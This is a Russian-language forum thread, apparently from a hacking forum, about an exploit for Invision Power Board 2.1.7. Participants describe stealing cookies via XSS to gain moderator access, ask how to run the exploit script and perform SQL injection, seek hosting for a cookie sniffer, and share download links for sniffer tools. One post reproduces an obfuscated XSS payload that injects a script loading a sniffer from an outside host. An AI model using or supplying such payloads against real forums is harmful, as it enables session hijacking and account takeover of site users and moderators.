![]() |
Invision Power Board 2.1.7 Exploit
----[ NITRO ... ] |
Евгений Минаев
Большое спасибо только я одного не понял почему ты это не запостил в закреплёной теме ipb удобней же когда все в одном месте . |
str_replace( '[', '[', $url )
смысл? |
Мне можно тут выложить фикс кода или это сделано спецально?
|
Doom123, написали что фикс существует уже год....
Найдут кому надо... |
Хм... Попробовал на локалхосте- XSS действительно работает. Подменил куки - F5 - и я уже модер. Только вот не получается провести инъекцию- как заюзать скрипт exploit.php? :confused:
|
Isis, Фикс в самом сплоите от иньекцию криво делает соль не правельную выводит... я и хотел фикс выставить ток не знал еси эт спецально сделано...
|
Патч мутим для замазки уязвимости?
Обьясните как сделать Sql Injection подробнее... |
Подскажите бесплатный хостинг где можно разместить сниффер(где пробывал не работает).
|
Цитата:
Цитата:
Народ дайте пожалуйста эксплойт перловый для IPB 2.1.X версий,к нему прикручин GUI интерфейс,и кажись называеться r57ipb... что-то такое,ну вообщем,буду благодарен! |
Цитата:
|
Цитата:
|
Код HTML:
Все предельно просто. Допустим наш снифер находится по адресу localhost/sniff/, а форум - test.ru/forum/www.milw0rm.com/sploits/2008-isniff.rar |
Сделал пост.
Не сработало. Форум изменил код на: <img src="http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,105,112,116)),script.src=/http:xxzamenil.zamenil.ruxsniffxya.js/.source.replace(/x/g,String.fromCharCode(47)),head=document.getElemen tsByTagName(String.fromCharCode(104,101,97,100)).i tem(0),head.appendChild(script) style=visibility:hidden =[/snapback].gif" border="0" alt="Изображение" /> Форум пропатченный? Я правильно понимаю, что нужно искать другую уязвимость? Я новичек. |
перезалейте файл http://www.underwater.itdefence.ru/isniff.rar
|
| Время: 19:21 |